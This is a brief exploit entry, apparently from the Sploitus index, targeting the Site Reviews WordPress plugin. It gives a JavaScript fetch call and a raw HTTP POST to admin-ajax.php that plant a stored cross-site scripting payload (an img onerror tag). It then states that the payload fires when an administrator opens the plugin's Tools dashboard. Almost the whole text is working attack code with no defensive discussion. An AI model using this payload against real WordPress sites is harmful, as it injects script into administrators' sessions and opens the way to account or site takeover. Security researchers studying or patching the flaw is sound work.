Share
## https://sploitus.com/exploit?id=WPEX-ID:0118F245-0E6F-44C1-9BDB-5B3A5D2403D6
fetch("https://example.com/wp-admin/admin-ajax.php?action=glsr_action", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "site-reviews[0]=</textarea><img+src+onerror=alert(1)>",
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

POST /wp-admin/admin-ajax.php?action=glsr_action HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close

site-reviews[0]=</textarea><img+src+onerror=alert(/XSS/)>

The XSS will be triggered when viewing the Tool dashboard of the plugin (/wp-admin/edit.php?post_type=site-review&page=glsr-tools)